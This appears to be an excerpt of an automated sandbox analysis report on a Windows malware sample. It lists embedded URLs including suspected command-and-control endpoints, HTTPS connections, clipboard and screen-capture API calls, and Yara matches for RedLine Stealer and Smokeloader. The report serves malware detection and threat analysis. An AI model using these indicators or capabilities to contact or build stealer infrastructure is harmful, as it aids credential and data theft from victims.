Source: Q7QR4k52HL.exe, 00000000.00000003.1728992190.0000000000500000.00000004.00000020.00020000.00000000.sdmp, Q7QR4k52HL.exe, 00000000.00000003.1729187340.0000000000509000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://s.ytimg.com;
Source: Q7QR4k52HL.exe, 00000000.00000003.1728992190.00000000004CC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://skidjazzyric.click/
Source: Q7QR4k52HL.exe, 00000000.00000002.1929908575.0000000000502000.00000004.00000020.00020000.00000000.sdmp, Q7QR4k52HL.exe, 00000000.00000003.1729187340.0000000000509000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sputnik-1985.com/
Source: Q7QR4k52HL.exe, 00000000.00000003.1729187340.0000000000509000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sputnik-1985.com/api
Source: Q7QR4k52HL.exe, 00000000.00000002.1929908575.0000000000502000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sputnik-1985.com/apiN
Source: Q7QR4k52HL.exe, 00000000.00000003.1742800786.0000000000500000.00000004.00000020.00020000.00000000.sdmp, Q7QR4k52HL.exe, 00000000.00000003.1728992190.0000000000500000.00000004.00000020.00020000.00000000.sdmp, Q7QR4k52HL.exe, 00000000.00000002.1929908575.0000000000502000.00000004.00000020.00020000.00000000.sdmp, Q7QR4k52HL.exe, 00000000.00000003.1729187340.0000000000509000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sputnik-1985.com/apiv
Source: Q7QR4k52HL.exe, 00000000.00000002.1929908575.00000000004DA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sputnik-1985.com:443/apiME=SYSTEMUSERPROFILE=C:
Source: Q7QR4k52HL.exe, 00000000.00000003.1728992190.0000000000500000.00000004.00000020.00020000.00000000.sdmp, Q7QR4k52HL.exe, 00000000.00000003.1729187340.0000000000509000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steam.tv/
Source: Q7QR4k52HL.exe, 00000000.00000003.1729187340.0000000000509000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/
Source: Q7QR4k52HL.exe, 00000000.00000003.1728942199.000000000054E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
Source: Q7QR4k52HL.exe, 00000000.00000003.1728942199.000000000054E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/discussions/
Source: Q7QR4k52HL.exe, 00000000.00000003.1728992190.00000000004B9000.00000004.00000020.00020000.00000000.sdmp, Q7QR4k52HL.exe, 00000000.00000003.1728942199.000000000054E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
Source: Q7QR4k52HL.exe, 00000000.00000003.1728942199.000000000054E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900
Source: Q7QR4k52HL.exe, 00000000.00000003.1728942199.000000000054E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/market/
Source: Q7QR4k52HL.exe, 00000000.00000003.1728942199.000000000054E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/my/wishlist/
Source: Q7QR4k52HL.exe, 00000000.00000002.1929790473.000000000019A000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900
Source: Q7QR4k52HL.exe, 00000000.00000003.1728992190.00000000004B9000.00000004.00000020.00020000.00000000.sdmp, Q7QR4k52HL.exe, 00000000.00000003.1728942199.000000000054E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/badges
Source: Q7QR4k52HL.exe, 00000000.00000003.1728942199.000000000054E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/inventory/
Source: Q7QR4k52HL.exe, 00000000.00000003.1728942199.000000000054E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/workshop/
Source: Q7QR4k52HL.exe, 00000000.00000003.1742800786.0000000000500000.00000004.00000020.00020000.00000000.sdmp, Q7QR4k52HL.exe, 00000000.00000003.1728992190.0000000000500000.00000004.00000020.00020000.00000000.sdmp, Q7QR4k52HL.exe, 00000000.00000003.1729187340.0000000000509000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steam
Source: Q7QR4k52HL.exe, 00000000.00000003.1728942199.000000000054E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/
Source: Q7QR4k52HL.exe, 00000000.00000003.1728942199.000000000054E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/about/
Source: Q7QR4k52HL.exe, 00000000.00000003.1728942199.000000000054E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/explore/
Source: Q7QR4k52HL.exe, 00000000.00000003.1728992190.00000000004B9000.00000004.00000020.00020000.00000000.sdmp, Q7QR4k52HL.exe, 00000000.00000003.1728942199.000000000054E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/legal/
Source: Q7QR4k52HL.exe, 00000000.00000003.1728942199.000000000054E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/mobile
Source: Q7QR4k52HL.exe, 00000000.00000003.1728942199.000000000054E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/news/
Source: Q7QR4k52HL.exe, 00000000.00000003.1728942199.000000000054E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/points/shop/
Source: Q7QR4k52HL.exe, 00000000.00000003.1728942199.000000000054E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/privacy_agreement/
Source: Q7QR4k52HL.exe, 00000000.00000003.1728942199.000000000054E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/stats/
Source: Q7QR4k52HL.exe, 00000000.00000003.1728942199.000000000054E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/steam_refunds/
Source: Q7QR4k52HL.exe, 00000000.00000003.1728942199.000000000054E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/subscriber_agreement/
Source: Q7QR4k52HL.exe, 00000000.00000003.1745668738.0000000002E7E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.microsof
Source: Q7QR4k52HL.exe, 00000000.00000003.1773562976.0000000002F4A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: Q7QR4k52HL.exe, 00000000.00000003.1773562976.0000000002F4A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: Q7QR4k52HL.exe, 00000000.00000003.1756803659.0000000002E75000.00000004.00000800.00020000.00000000.sdmp, Q7QR4k52HL.exe, 00000000.00000003.1745780518.0000000002E75000.00000004.00000800.00020000.00000000.sdmp, Q7QR4k52HL.exe, 00000000.00000003.1745668738.0000000002E7C000.00000004.00000800.00020000.00000000.sdmp, Q7QR4k52HL.exe, 00000000.00000003.1757013963.0000000002E75000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: Q7QR4k52HL.exe, 00000000.00000003.1745780518.0000000002E50000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
Source: Q7QR4k52HL.exe, 00000000.00000003.1756803659.0000000002E75000.00000004.00000800.00020000.00000000.sdmp, Q7QR4k52HL.exe, 00000000.00000003.1745780518.0000000002E75000.00000004.00000800.00020000.00000000.sdmp, Q7QR4k52HL.exe, 00000000.00000003.1745668738.0000000002E7C000.00000004.00000800.00020000.00000000.sdmp, Q7QR4k52HL.exe, 00000000.00000003.1757013963.0000000002E75000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: Q7QR4k52HL.exe, 00000000.00000003.1745780518.0000000002E50000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
Source: Q7QR4k52HL.exe, 00000000.00000003.1745256798.0000000002E4F000.00000004.00000800.00020000.00000000.sdmp, Q7QR4k52HL.exe, 00000000.00000003.1745336519.0000000002E38000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: Q7QR4k52HL.exe, 00000000.00000003.1745256798.0000000002E4F000.00000004.00000800.00020000.00000000.sdmp, Q7QR4k52HL.exe, 00000000.00000003.1745336519.0000000002E38000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: Q7QR4k52HL.exe, 00000000.00000003.1742800786.0000000000500000.00000004.00000020.00020000.00000000.sdmp, Q7QR4k52HL.exe, 00000000.00000003.1728992190.0000000000500000.00000004.00000020.00020000.00000000.sdmp, Q7QR4k52HL.exe, 00000000.00000003.1729187340.0000000000509000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/recaptc
Source: Q7QR4k52HL.exe, 00000000.00000003.1742800786.0000000000500000.00000004.00000020.00020000.00000000.sdmp, Q7QR4k52HL.exe, 00000000.00000003.1728992190.0000000000500000.00000004.00000020.00020000.00000000.sdmp, Q7QR4k52HL.exe, 00000000.00000003.1729187340.0000000000509000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/recaptcha/
Source: Q7QR4k52HL.exe, 00000000.00000003.1742800786.0000000000500000.00000004.00000020.00020000.00000000.sdmp, Q7QR4k52HL.exe, 00000000.00000003.1728992190.0000000000500000.00000004.00000020.00020000.00000000.sdmp, Q7QR4k52HL.exe, 00000000.00000003.1729187340.0000000000509000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com/re
Source: Q7QR4k52HL.exe, 00000000.00000003.1773562976.0000000002F4A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
Source: Q7QR4k52HL.exe, 00000000.00000003.1773562976.0000000002F4A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
Source: Q7QR4k52HL.exe, 00000000.00000003.1773562976.0000000002F4A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: Q7QR4k52HL.exe, 00000000.00000003.1773562976.0000000002F4A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: Q7QR4k52HL.exe, 00000000.00000003.1773562976.0000000002F4A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: Q7QR4k52HL.exe, 00000000.00000003.1728942199.000000000054E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
Source: Q7QR4k52HL.exe, 00000000.00000003.1728992190.0000000000500000.00000004.00000020.00020000.00000000.sdmp, Q7QR4k52HL.exe, 00000000.00000003.1729187340.0000000000509000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/

Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49734

Source: unknown	HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.4:49733 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.4:49734 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.4:49735 version: TLS 1.2

Source: C:\Users\user\Desktop\Q7QR4k52HL.exe

Code function: 0_2_004367F0 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,

0_2_004367F0

Source: C:\Users\user\Desktop\Q7QR4k52HL.exe

Code function: 0_2_004367F0 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,

0_2_004367F0

Source: C:\Users\user\Desktop\Q7QR4k52HL.exe

Code function: 0_2_00436980 GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,SelectObject,DeleteDC,StretchBlt,ReleaseDC,DeleteObject,DeleteObject,

0_2_00436980

System Summary

Malicious sample detected (through community Yara rule)

Source: 00000000.00000002.1930124368.0000000000580000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000000.00000002.1930228684.0000000000810000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown

Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 0_2_0043B870	0_2_0043B870
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 0_2_00408880	0_2_00408880
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 0_2_0040CA62	0_2_0040CA62
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 0_2_0040B2B0	0_2_0040B2B0
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 0_2_00421E70	0_2_00421E70
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 0_2_00415720	0_2_00415720
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 0_2_0040CFEC	0_2_0040CFEC
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 0_2_00419840	0_2_00419840
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 0_2_00406850	0_2_00406850
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 0_2_00427860	0_2_00427860
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 0_2_00427070	0_2_00427070
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 0_2_0043080E	0_2_0043080E
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 0_2_0043F820	0_2_0043F820
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 0_2_0041D0C0	0_2_0041D0C0
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 0_2_004418A0	0_2_004418A0
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 0_2_0041194F	0_2_0041194F
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 0_2_0043F150	0_2_0043F150
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 0_2_0042B170	0_2_0042B170
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 0_2_00403900	0_2_00403900
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 0_2_00425100	0_2_00425100
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 0_2_00439923	0_2_00439923
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 0_2_00427133	0_2_00427133
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 0_2_00433930	0_2_00433930
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 0_2_004121DB	0_2_004121DB
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 0_2_0042A9F7	0_2_0042A9F7
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 0_2_0040E9B0	0_2_0040E9B0
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 0_2_0041825B	0_2_0041825B
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 0_2_0042EA62	0_2_0042EA62
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 0_2_00442A60	0_2_00442A60
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 0_2_0041DAD0	0_2_0041DAD0
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 0_2_00429ADE	0_2_00429ADE
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 0_2_00425AF0	0_2_00425AF0
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 0_2_004092A0	0_2_004092A0
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 0_2_00405AB0	0_2_00405AB0
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 0_2_004042B0	0_2_004042B0
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 0_2_0043CB40	0_2_0043CB40
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 0_2_0042EB5F	0_2_0042EB5F
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 0_2_00408360	0_2_00408360
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 0_2_00428B67	0_2_00428B67
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 0_2_00437B69	0_2_00437B69
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 0_2_00402B20	0_2_00402B20
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 0_2_00441B20	0_2_00441B20
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 0_2_00432B24	0_2_00432B24
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 0_2_004063C0	0_2_004063C0
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 0_2_0042DBF0	0_2_0042DBF0
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 0_2_00422380	0_2_00422380
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 0_2_0041BBA0	0_2_0041BBA0
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 0_2_0042BBA0	0_2_0042BBA0
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 0_2_0042EBA1	0_2_0042EBA1
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 0_2_0042EBB3	0_2_0042EBB3
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 0_2_00441BB0	0_2_00441BB0
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 0_2_00441C40	0_2_00441C40
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 0_2_00442470	0_2_00442470
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 0_2_00426C76	0_2_00426C76
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 0_2_0041D400	0_2_0041D400
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 0_2_0041C400	0_2_0041C400
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 0_2_00417405	0_2_00417405
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 0_2_00414C20	0_2_00414C20
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 0_2_00432426	0_2_00432426
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 0_2_00428437	0_2_00428437
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 0_2_0043443D	0_2_0043443D
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 0_2_004354C4	0_2_004354C4
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 0_2_00434CEF	0_2_00434CEF
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 0_2_0043A4EF	0_2_0043A4EF
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 0_2_004374AB	0_2_004374AB
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 0_2_0041DCB0	0_2_0041DCB0
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 0_2_0043ACB0	0_2_0043ACB0
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 0_2_0042FCBC	0_2_0042FCBC
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 0_2_0040D545	0_2_0040D545
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 0_2_00425D6A	0_2_00425D6A
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 0_2_00435D13	0_2_00435D13
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 0_2_00442D20	0_2_00442D20
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 0_2_0043CD27	0_2_0043CD27
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 0_2_00404DC0	0_2_00404DC0
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 0_2_00420D90	0_2_00420D90
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 0_2_0043C5A0	0_2_0043C5A0
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 0_2_00436610	0_2_00436610
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 0_2_00407620	0_2_00407620
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 0_2_0040AE30	0_2_0040AE30
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 0_2_0041F6D0	0_2_0041F6D0
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 0_2_00416ED0	0_2_00416ED0
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 0_2_0041BEE1	0_2_0041BEE1
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 0_2_00402EF0	0_2_00402EF0
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 0_2_004186FC	0_2_004186FC
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 0_2_00423EFF	0_2_00423EFF
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 0_2_00431E8E	0_2_00431E8E
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 0_2_0041A690	0_2_0041A690
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 0_2_0041AF24	0_2_0041AF24
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 0_2_00427F30	0_2_00427F30
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 0_2_0040DFE2	0_2_0040DFE2
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 0_2_004257E0	0_2_004257E0
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 0_2_00429FE4	0_2_00429FE4
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 0_2_00409790	0_2_00409790
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 0_2_004427B0	0_2_004427B0
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 0_2_00441FB0	0_2_00441FB0
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 0_2_0081B097	0_2_0081B097
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 0_2_008360B7	0_2_008360B7
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 0_2_008320D7	0_2_008320D7
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 0_2_008420F5	0_2_008420F5
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 0_2_00852017	0_2_00852017
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 0_2_0082B18B	0_2_0082B18B
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 0_2_00838197	0_2_00838197
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 0_2_0082C148	0_2_0082C148
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 0_2_00813157	0_2_00813157
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 0_2_00834166	0_2_00834166
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 0_2_0081E249	0_2_0081E249
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 0_2_0081D253	0_2_0081D253
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 0_2_008373B2	0_2_008373B2
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 0_2_0084F3B7	0_2_0084F3B7
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 0_2_0083A305	0_2_0083A305
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 0_2_0082D327	0_2_0082D327
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 0_2_008284C2	0_2_008284C2
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 0_2_00822442	0_2_00822442
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 0_2_008185C7	0_2_008185C7
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 0_2_008325E7	0_2_008325E7
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 0_2_00819507	0_2_00819507
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 0_2_00814517	0_2_00814517
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 0_2_0084268D	0_2_0084268D
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 0_2_008446A4	0_2_008446A4
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 0_2_008526D7	0_2_008526D7
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 0_2_00816627	0_2_00816627
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 0_2_0082D667	0_2_0082D667
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 0_2_0082C667	0_2_0082C667
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 0_2_0081D7AC	0_2_0081D7AC
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 0_2_00847712	0_2_00847712
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 0_2_0084572B	0_2_0084572B
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 0_2_0084A756	0_2_0084A756
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 0_2_00817887	0_2_00817887
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 0_2_0082A8F7	0_2_0082A8F7
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 0_2_0084C807	0_2_0084C807
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 0_2_00846877	0_2_00846877
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 0_2_008199F7	0_2_008199F7
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 0_2_0082F937	0_2_0082F937
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 0_2_0084FA87	0_2_0084FA87
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 0_2_00829AA7	0_2_00829AA7
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 0_2_00816AB7	0_2_00816AB7
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 0_2_0084BAD7	0_2_0084BAD7
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 0_2_00818AE7	0_2_00818AE7
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 0_2_00827AE4	0_2_00827AE4
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 0_2_00852A17	0_2_00852A17
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 0_2_00840A75	0_2_00840A75
Source: C:\Users\user\Desktop\Q7QR4k52HL.exe	Code function: 0_2_00849B8A	0_2_00849B8A
